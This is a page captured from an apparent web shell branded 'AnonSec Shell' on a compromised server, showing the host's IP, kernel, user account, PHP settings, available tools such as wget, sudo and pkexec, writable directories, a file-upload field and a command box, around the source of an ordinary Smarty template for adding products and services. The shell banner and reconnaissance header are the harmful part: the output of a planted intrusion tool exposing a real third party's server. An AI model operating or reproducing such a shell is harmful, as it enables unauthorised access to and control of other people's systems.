AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.217.80
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/hering/ui/theme/lrsys/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/hering/ui/theme/lrsys/add-ps.tpl
{include file="sections/header.tpl"}
<div class="wrapper wrapper-content">
    <div class="row">

        <div class="col-lg-12">
            <div class="ibox float-e-margins">
                <div class="ibox-title">
                    <h5>
                        {if $type eq 'Product'}
                            {$_L['Add Product']}
                            {else}
                            {$_L['Add Service']}
                        {/if}


                    </h5>
                    <div class="ibox-tools">
                       {if $type eq 'Product'}
                           <a href="{$_url}ps/p-list" class="btn btn-primary btn-xs">{$_L['List Products']}</a>

                       {/if}
                        {if $type eq 'Service'}
                            <a href="{$_url}ps/s-list" class="btn btn-primary btn-xs">{$_L['List Services']}</a>
                        {/if}


                    </div>
                </div>
                <div class="ibox-content" id="ibox_form">
                    <div class="alert alert-danger" id="emsg">
                        <span id="emsgbody"></span>
                    </div>

                    <form class="form-horizontal" id="rform">

                        <div class="form-group"><label class="col-lg-2 control-label" for="name">{$_L['Name']}{$_L['*']}</label>

                            <div class="col-lg-10"><input type="text" id="name" name="name" class="form-control" autocomplete="off">

                            </div>
                        </div>

                        <div class="form-group"><label class="col-lg-2 control-label" for="sales_price">{$_L['Sales Price']}{$_L['*']}</label>

                            <div class="col-lg-4"><input type="text" id="sales_price" name="sales_price" class="form-control amount" autocomplete="off" data-a-sign="{$_c['currency_code']} "  data-a-dec="{$_c['dec_point']}" data-a-sep="{$_c['thousands_sep']}" data-d-group="2">

                            </div>
                        </div>
                        <div class="form-group"><label class="col-lg-2 control-label" for="item_number">{$_L['Item Number']}</label>

                            <div class="col-lg-10"><input type="text" id="item_number" value="{$nxt}" name="item_number" class="form-control" autocomplete="off">

                            </div>
                        </div>
                        <div class="form-group"><label class="col-lg-2 control-label" for="description">{$_L['Description']}</label>
                            <div class="col-lg-10"><textarea id="description" name='description' class="form-control" rows="3"></textarea>
                            </div>
                        </div>
                        <div class="form-group">
                            <label class="col-lg-2 control-label"> {$_L['Common nomenclature of Mercosur']}{$_L['*']}</label>                         
                            <div class="col-lg-3">
                                <input type="text"  id="mercosur_nomenclature"  name="mercosur_nomenclature" class="form-control ncm" autocomplete="off">
                            </div>
                        </div>
                        <div class="form-group"> 
                            <label class="col-lg-2 control-label">{$_L['Cod. Ex. IPI']}{$_L['*']}</label>
                            <div class="col-lg-2">
                                <input type="number" min='0' max='99999999999999' id="codigo_execao_ipi"  name="codigo_execao_ipi" class="form-control" autocomplete="off">
                            </div>
                        </div>
                
                        <div class="form-group"> 
                            <label class="col-lg-2 control-label">{$_L['Unit']}{$_L['*']}</label>
                            <div class="col-lg-4">
                                <select name="unit" id="unit" class="form-control select2"></select>
                              <!--  <span class="help-block"><a href="#" id="add_new_unit">{$_L['Add New Unit']}</a> </span> -->
                            </div>
                        </div>
                
                                
<input type="hidden" id="type" name="type" value="{$type}">



                        <div class="form-group">
                            <div class="col-lg-offset-2 col-lg-10">

                                <button class="btn btn-sm btn-primary" type="submit" id="submit">{$_L['Submit']}</button>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>


</div>
{include file="sections/footer.tpl"}

Anon7 - 2022
AnonSec Team